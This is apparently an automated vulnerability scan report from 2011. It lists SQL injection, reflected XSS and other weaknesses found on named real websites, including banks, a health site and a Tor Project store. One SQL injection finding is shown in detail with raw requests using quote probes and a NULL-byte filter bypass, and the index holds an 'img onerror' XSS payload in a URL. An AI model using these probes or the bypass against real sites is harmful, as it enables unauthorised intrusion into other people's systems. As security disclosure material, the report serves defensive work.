XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07202011-02

Report generated by XSS.CX at Wed Jul 20 07:31:55 CDT 2011.


1. SQL injection

1.1. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786 [REST URL parameter 3]

1.2. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858 [REST URL parameter 2]

1.3. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 1]

1.4. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 2]

1.5. http://networkpresence.com.au/index.php/Services/ [REST URL parameter 2]

1.6. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 2]

1.7. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 3]

1.8. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 4]

1.9. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 5]

1.10. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 1]

1.11. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 2]

1.12. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 3]

1.13. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 4]

1.14. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [REST URL parameter 5]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [hcpage2 parameter]

2.2. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms [ugc parameter]

2.3. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

2.4. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

2.5. http://networkpresence.com.au/index.php/Services/ [name of an arbitrarily supplied request parameter]

2.6. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [h parameter]

2.7. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [sw parameter]

2.8. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php [w parameter]

2.9. https://secure2.internode.on.net/nodestore/cart/build [REST URL parameter 3]

2.10. https://secure2.internode.on.net/nodestore/cart/save/order/ [REST URL parameter 3]

2.11. https://secure2.internode.on.net/nodestore/cart/save/order/undefined [REST URL parameter 3]

2.12. https://secure2.internode.on.net/nodestore/cart/save5e977%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3Ebe29bd4cc6f/order/a [REST URL parameter 3]

2.13. http://www.codero.com/images/design/banner-green-bundle.png [REST URL parameter 1]

2.14. http://www.codero.com/images/design/banner-priceMatch.png [REST URL parameter 1]

2.15. http://www.codero.com/images/design/banner_50off-promo.png [REST URL parameter 1]

2.16. http://www.codero.com/images/design/banner_certified-expertise.png [REST URL parameter 1]

2.17. http://www.codero.com/images/design/banner_i7-promo.png [REST URL parameter 1]

2.18. http://www.codero.com/images/design/menu_i7-promo.png [REST URL parameter 1]

2.19. http://www.codero.com/images/design/rc_i7-promo.jpg [REST URL parameter 1]

2.20. http://www.printfection.com/torprojectstore [name of an arbitrarily supplied request parameter]

2.21. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [REST URL parameter 3]

2.22. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139 [name of an arbitrarily supplied request parameter]

2.23. https://www.wellsfargo.com/locator/atm/search [txtCity parameter]

2.24. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

2.25. https://online.wellsfargo.com/das/channel/enrollDisplay [wfacookie cookie]

3. Flash cross-domain policy

3.1. http://ad.doubleclick.net/crossdomain.xml

3.2. https://adfarm.mediaplex.com/crossdomain.xml

3.3. http://b.scorecardresearch.com/crossdomain.xml

3.4. http://c.atdmt.com/crossdomain.xml

3.5. http://c.scout.com/crossdomain.xml

3.6. http://cdn-cms.scout.com/crossdomain.xml

3.7. http://dev.virtualearth.net/crossdomain.xml

3.8. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

3.9. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

3.10. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

3.11. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

3.12. http://img1.catalog.video.msn.com/crossdomain.xml

3.13. http://img2.catalog.video.msn.com/crossdomain.xml

3.14. http://img3.catalog.video.msn.com/crossdomain.xml

3.15. http://img4.catalog.video.msn.com/crossdomain.xml

3.16. http://minerva.healthcentral.com/crossdomain.xml

3.17. http://sensor2.suitesmart.com/crossdomain.xml

3.18. http://static.suitesmart.com/crossdomain.xml

3.19. http://statse.webtrendslive.com/crossdomain.xml

3.20. http://t0.tiles.virtualearth.net/crossdomain.xml

3.21. http://www.scout.com/crossdomain.xml

3.22. http://feeds.bbci.co.uk/crossdomain.xml

3.23. http://googleads.g.doubleclick.net/crossdomain.xml

3.24. http://newsrss.bbc.co.uk/crossdomain.xml

3.25. http://server.iad.liveperson.net/crossdomain.xml

3.26. http://www.codero.com/crossdomain.xml

3.27. http://www.healthcentral.com/crossdomain.xml

3.28. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.3. http://c.atdmt.com/clientaccesspolicy.xml

4.4. http://c.scout.com/clientaccesspolicy.xml

4.5. http://dev.virtualearth.net/clientaccesspolicy.xml

4.6. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

4.7. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

4.8. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

4.9. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

4.10. http://img1.catalog.video.msn.com/clientaccesspolicy.xml

4.11. http://img2.catalog.video.msn.com/clientaccesspolicy.xml

4.12. http://img3.catalog.video.msn.com/clientaccesspolicy.xml

4.13. http://img4.catalog.video.msn.com/clientaccesspolicy.xml

4.14. http://minerva.healthcentral.com/clientaccesspolicy.xml

4.15. http://t0.tiles.virtualearth.net/clientaccesspolicy.xml

4.16. http://a1.bing4.com/clientaccesspolicy.xml

4.17. http://a2.bing4.com/clientaccesspolicy.xml

4.18. http://a4.bing4.com/clientaccesspolicy.xml

4.19. http://ts1.mm.bing.net/clientaccesspolicy.xml

4.20. http://ts2.mm.bing.net/clientaccesspolicy.xml

4.21. http://ts3.mm.bing.net/clientaccesspolicy.xml

4.22. http://ts4.mm.bing.net/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

5.2. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

6. Session token in URL

7. SSL certificate

7.1. https://adfarm.mediaplex.com/

7.2. https://www.torservers.net/

7.3. https://www.wellsfargoadvisors.com/

7.4. https://blog.torproject.org/

7.5. https://online.educaid.com/

7.6. https://online.wellsfargo.com/

7.7. https://onlineservices.wachovia.com/

7.8. https://secure.codero.com/

7.9. https://secure.internode.on.net/

7.10. https://secure2.internode.on.net/

7.11. https://wellsfargo.com/

7.12. https://wellsoffice.wellsfargo.com/

7.13. https://wfefs.wellsfargo.com/

7.14. https://www.torproject.org/

7.15. https://www.wachovia.com/

7.16. https://www.wellsfargo.com/

8. Cookie without HttpOnly flag set

8.1. https://www.wellsfargo.com/

8.2. http://b.scorecardresearch.com/b

8.3. http://bing.com/

8.4. http://c.atdmt.com/c.gif

8.5. http://c.bing.com/c.gif

8.6. http://odb.outbrain.com/utils/get

8.7. https://online.wellsfargo.com/das/signon

8.8. https://online.wellsfargo.com/signon

8.9. http://paid.outbrain.com/network/redir

8.10. http://sensor2.suitesmart.com/sensor4.js

8.11. http://server.iad.liveperson.net/hc/3194108/

8.12. http://server.iad.liveperson.net/hc/3194108/

8.13. http://statse.webtrendslive.com/dcsk7l4il00000wwytasjl7cu_1n7o/dcs.gif

8.14. https://wellsoffice.wellsfargo.com/

8.15. http://www.bing.com/community/css-classnameexpansion.ashx

8.16. http://www.bing.com/events/search

8.17. http://www.bing.com/fd/AnswerBarHandler

8.18. http://www.bing.com/fd/InlineFeedbackHandler.aspx

8.19. http://www.bing.com/fd/ls/GLinkPing.aspx

8.20. http://www.bing.com/fd/ls/l

8.21. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

8.22. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

8.23. http://www.bing.com/maps/MapAppsScript.ashx

8.24. http://www.bing.com/maps/MapAppsScript.ashx

8.25. http://www.bing.com/maps/default.aspx

8.26. http://www.bing.com/maps/default.aspx

8.27. http://www.bing.com/news/s/news3B_c.css

8.28. http://www.bing.com/news/s/news3B_c.js

8.29. http://www.bing.com/news/s/news3S_c.css

8.30. http://www.bing.com/news/s/news3S_c.js

8.31. http://www.bing.com/videos/vthumb_c.css

8.32. http://www.printfection.com/torprojectstore

8.33. http://www.printfection.com/torprojectstore/T-Shirt/_p_4740139

8.34. http://www.rockhall.co.uk/10.html

8.35. http://www.rockhall.co.uk/ContactStyles

8.36. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

8.37. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

8.38. http://www.rockhall.co.uk/favicon.ico

8.39. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

8.40. https://www.wellsfargo.com/tas

9. Password field with autocomplete enabled

9.1. https://secure2.internode.on.net/nodestore/

9.2. https://secure2.internode.on.net/nodestore/checkout/customer/

9.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

9.4. https://wfefs.wellsfargo.com/boa/

9.5. https://wfefs.wellsfargo.com/eoa/

9.6. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

9.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

10. Referer-dependent response

11. Cross-domain POST

11.1. https://www.torservers.net/donate.html

11.2. https://www.torservers.net/donate.html

11.3. https://www.wellsfargoadvisors.com/

11.4. https://www.wellsfargoadvisors.com/js/branchLocator.js

11.5. https://www.wellsfargoadvisors.com/online-access/signon.htm

12. SSL cookie without secure flag set

12.1. https://online.wellsfargo.com/das/signon

12.2. https://online.wellsfargo.com/signon

12.3. https://secure.codero.com/order/v/shop

12.4. https://secure.codero.com/order/v/viewcart

12.5. https://secure.codero.com/vpublic/js/orderform-ws.php

12.6. https://www.wellsfargo.com/tas

13. Cookie scoped to parent domain

13.1. http://b.scorecardresearch.com/b

13.2. http://c.atdmt.com/c.gif

13.3. http://c.bing.com/c.gif

13.4. http://odb.outbrain.com/utils/get

13.5. https://online.wellsfargo.com/das/signon

13.6. https://online.wellsfargo.com/signon

13.7. http://paid.outbrain.com/network/redir

13.8. http://sensor2.suitesmart.com/sensor4.js

13.9. http://server.iad.liveperson.net/hc/3194108/

13.10. https://wellsoffice.wellsfargo.com/

13.11. http://www.bing.com/community/css-classnameexpansion.ashx

13.12. http://www.bing.com/events/search

13.13. http://www.bing.com/fd/AnswerBarHandler

13.14. http://www.bing.com/fd/InlineFeedbackHandler.aspx

13.15. http://www.bing.com/fd/ls/GLinkPing.aspx

13.16. http://www.bing.com/fd/ls/l

13.17. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

13.18. http://www.bing.com/maps/AppGalleryDisplayProvider.ashx

13.19. http://www.bing.com/maps/MapAppsScript.ashx

13.20. http://www.bing.com/maps/MapAppsScript.ashx

13.21. http://www.bing.com/maps/default.aspx

13.22. http://www.bing.com/maps/default.aspx

13.23. http://www.bing.com/news/s/news3B_c.css

13.24. http://www.bing.com/news/s/news3B_c.js

13.25. http://www.bing.com/news/s/news3S_c.css

13.26. http://www.bing.com/news/s/news3S_c.js

13.27. http://www.bing.com/videos/vthumb_c.css

13.28. https://www.wellsfargo.com/tas

14. Cross-domain Referer leakage

14.1. https://online.wellsfargo.com/das/channel/enrollDisplay

14.2. https://online.wellsfargo.com/signon

14.3. https://onlineservices.wachovia.com/auth/AuthService

14.4. https://onlineservices.wachovia.com/identity/IdentityMgr

14.5. https://onlineservices.wachovia.com/identity/IdentityMgr

14.6. https://secure.codero.com/order/v/shop

14.7. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

14.8. http://www.bing.com/ScriptResource.axd

14.9. http://www.bing.com/WebResource.axd

14.10. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

14.11. https://www.wellsfargo.com/locator/atm/search

15. Cross-domain script include

15.1. https://onlineservices.wachovia.com/auth/AuthService

15.2. https://onlineservices.wachovia.com/identity/IdentityMgr

15.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

15.4. http://www.defaultroute.com/

15.5. http://www.defaultroute.com/category/founders/

15.6. http://www.defaultroute.com/services/thenetwork/

15.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

15.8. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

15.9. http://www.healthcentral.com/common/js/healthcentral_common.js

15.10. http://www.rockhall.co.uk/ContactStyles

15.11. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff

15.12. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff

15.13. http://www.rockhall.co.uk/favicon.ico

15.14. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

15.15. https://www.wellsfargo.com/locator/atm/search

15.16. https://www.wellsfargoadvisors.com/online-access/signon.htm

16. File upload functionality

17. TRACE method is enabled

17.1. https://blog.torproject.org/

17.2. http://networkpresence.com.au/

17.3. http://sensor2.suitesmart.com/

17.4. http://www.defaultroute.com/

17.5. https://www.wellsfargoadvisors.com/

18. Email addresses disclosed

18.1. http://ads1.msads.net/library/dap.js

18.2. http://ads1.msn.com/library/dap.js

18.3. https://onlineservices.wachovia.com/identity/IdentityMgr

18.4. https://secure2.internode.on.net/nodestore/checkout/customer/

18.5. http://widgets.twimg.com/j/2/widget.css

18.6. http://widgets.twimg.com/j/2/widget.js

18.7. http://www.codero.com/css/screen.css

18.8. http://www.codero.com/css/style.css

18.9. http://www.codero.com/js/hoverIntent.js

18.10. http://www.defaultroute.com/

18.11. http://www.defaultroute.com/category/founders/

18.12. http://www.defaultroute.com/services/thenetwork/

18.13. https://www.torservers.net/donate.html

18.14. https://www.wachovia.com/common_files/metrics/vignette/stats.js

18.15. https://www.wellsfargo.com/help/

18.16. https://www.wellsfargo.com/privacy_security/

18.17. https://www.wellsfargo.com/privacy_security/fraud/

18.18. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

18.19. https://www.wellsfargoadvisors.com/js/contactUsFA.js

19. Robots.txt file

19.1. http://a1.bing4.com/imagenewsfetcher.aspx

19.2. http://a2.bing4.com/imagenewsfetcher.aspx

19.3. http://a4.bing4.com/imagenewsfetcher.aspx

19.4. http://ad.doubleclick.net/adj/cm.ver.adhd_search/slideshow/womensymptoms

19.5. https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5

19.6. http://api.twitter.com/1/statuses/user_timeline.json

19.7. http://b.scorecardresearch.com/b

19.8. https://blog.torproject.org/images/favicon.ico

19.9. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx

19.10. http://cdn-forums.scout.com/adfeed.ashx

19.11. http://feeds.bbci.co.uk/news/rss.xml

19.12. http://fonts.googleapis.com/css

19.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1031455071/

19.14. http://l.addthiscdn.com/live/t00/250lo.gif

19.15. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

19.16. http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php

19.17. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

19.18. http://odb.outbrain.com/utils/ping.html

19.19. https://online.wellsfargo.com/signon

19.20. http://paid.outbrain.com/favicon.ico

19.21. https://secure.codero.com/order/v/shop

19.22. https://secure2.internode.on.net/nodestore

19.23. http://sensor2.suitesmart.com/sensor4.js

19.24. http://static.suitesmart.com/cs/99845/tags/dfa.js

19.25. http://themes.googleusercontent.com/static/fonts/molengo/v1/z1JWuCBrQt_Ta83eqIo6Dg.woff

19.26. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp

19.27. http://www.codero.com/images/design/menu_i7-promo.png

19.28. http://www.defaultroute.com/

19.29. http://www.google-analytics.com/__utm.gif

19.30. http://www.googleadservices.com/pagead/conversion/1031455071/

19.31. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

19.32. http://www.internode.on.net/

19.33. http://www.printfection.com/torprojectstore

19.34. http://www.rockhall.co.uk/ContactStyles

19.35. http://www.scout.com/favicon.ico

19.36. https://www.torproject.org/

19.37. https://www.torservers.net/

19.38. https://www.wachovia.com/enroll

19.39. http://www.wellsfargo.com/favicon.ico

19.40. https://www.wellsfargo.com/

19.41. https://www.wellsfargoadvisors.com/

20. Cacheable HTTPS response

20.1. https://onlineservices.wachovia.com/favicon.ico

20.2. https://onlineservices.wachovia.com/ols/css/interference.css

20.3. https://www.torproject.org/

20.4. https://www.torproject.org/css/master.css

20.5. https://www.torproject.org/docs/documentation.html.en

20.6. https://www.torservers.net/

20.7. https://www.torservers.net/donate.html

20.8. https://www.wachovia.com/

20.9. https://www.wachovia.com/enroll

20.10. https://www.wachovia.com/files/pres/interference.css

20.11. https://www.wachovia.com/foundation/v/index.jsp

20.12. https://www.wachovia.com/miscpop1197

20.13. https://www.wachovia.com/retirementlogin

20.14. https://www.wellsfargo.com/careers/

20.15. https://www.wellsfargo.com/com/contact_us_form

20.16. https://www.wellsfargo.com/com/rcbo_locator/search

20.17. https://www.wellsfargo.com/com/shareowner_services/services_for_shareholders/investment_plan/hmnfinancial

20.18. https://www.wellsfargo.com/help/

20.19. https://www.wellsfargo.com/help/faqs/signon_faqs

20.20. https://www.wellsfargo.com/locator/atm/search

20.21. https://www.wellsfargo.com/locator/atm/services

20.22. https://www.wellsfargo.com/pi_action/rcboLocator

20.23. https://www.wellsfargo.com/privacy_security/

20.24. https://www.wellsfargo.com/privacy_security/fraud/

20.25. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

20.26. https://www.wellsfargo.com/products_services/applications_viewall

20.27. https://www.wellsfargo.com/search/search

20.28. https://www.wellsfargo.com/sitemap/

20.29. https://www.wellsfargo.com/tas

20.30. https://www.wellsfargo.com/wachovia/access

20.31. https://www.wellsfargo.com/wachovia/retirementplan/amp

20.32. https://www.wellsfargo.com/wachovia/retirementplan/wrs

20.33. https://www.wellsfargo.com/wachovia/student

20.34. https://www.wellsfargoadvisors.com/

20.35. https://www.wellsfargoadvisors.com/conversion/signon-decision.htm

20.36. https://www.wellsfargoadvisors.com/favicon.ico

20.37. https://www.wellsfargoadvisors.com/market-economy/economic-market-reports/stock-markets.htm

20.38. https://www.wellsfargoadvisors.com/online-access/signon.htm

20.39. https://www.wellsfargoadvisors.com/wfa/username-password-help.htm

21. Multiple content types specified

22. HTML does not specify charset

22.1. http://ds.addthis.com/red/psi/sites/www.healthcentral.com/p.json

22.2. http://odb.outbrain.com/utils/ping.html

22.3. http://sensor2.suitesmart.com/sensor4.js

22.4. http://www.internode.on.net/js/promo-config-20080613.php

22.5. https://www.wachovia.com/

23. Content type incorrectly stated

23.1. https://onlineservices.wachovia.com/favicon.ico

23.2. https://onlineservices.wachovia.com/ols/css/interference.css

23.3. http://sc1.maps.live.com/i/bin/20110629.2253/action_item_bullet.gif

23.4. https://secure.codero.com/vpublic/js/orderform-ws.php

23.5. http://sensor2.suitesmart.com/sensor4.js

23.6. http://server.iad.liveperson.net/hcp/html/mTag.js

23.7. http://t0.tiles.virtualearth.net/tiles/dp/content

23.8. http://www.bing.com/fd/AnswerBarHandler

23.9. http://www.bing.com/getimage

23.10. http://www.bing.com/maps/default.aspx

23.11. http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico

23.12. http://www.internode.on.net/js/promo-config-20080613.php

23.13. http://www.printfection.com/favicon.ico

23.14. https://www.torproject.org/css/master.css

23.15. https://www.wachovia.com/files/pres/interference.css

23.16. https://www.wellsfargo.com/img/ads/smedia.JPG

23.17. https://www.wellsfargo.com/img/locator/results_wachovia_box.jpg

23.18. https://www.wellsfargo.com/img/locator/results_wellsfargo_box.jpg

23.19. https://www.wellsfargoadvisors.com/favicon.ico

24. Content type is not specified

24.1. http://paid.outbrain.com/network/redir

24.2. https://wfefs.wellsfargo.com/eoa/common/scripts/utility/utility_scripts.js



1. SQL injection
There are 14 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn26357876497786

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/cmi-choicemediacom%00'/1/H.6-pdv-2/thcn26357876497786?[AQB]&ndh=1&t=18/6/2011%2020%3A59%3A1%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Feeling%20Low%20Self-Worth&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&r=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&cc=USD&ch=ADHD%20Vertical&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CFeeling%20Low%20Self-Worth&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=2&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Feeling%20Low%20Self-Worth&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&c12=2011-07-18&c37=PROMOSLIDE&pid=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&pidt=1&oid=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit&ot=A&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:10:53 GMT
Server: Omniture DC/2.0.0
Content-Length: 426
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/cmi-choicemediacom was not found on this server
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/cmi-choicemediacom%00''/1/H.6-pdv-2/thcn26357876497786?[AQB]&ndh=1&t=18/6/2011%2020%3A59%3A1%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Feeling%20Low%20Self-Worth&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&r=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&cc=USD&ch=ADHD%20Vertical&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CFeeling%20Low%20Self-Worth&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=2&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Feeling%20Low%20Self-Worth&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/&c12=2011-07-18&c37=PROMOSLIDE&pid=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&pidt=1&oid=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit&ot=A&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
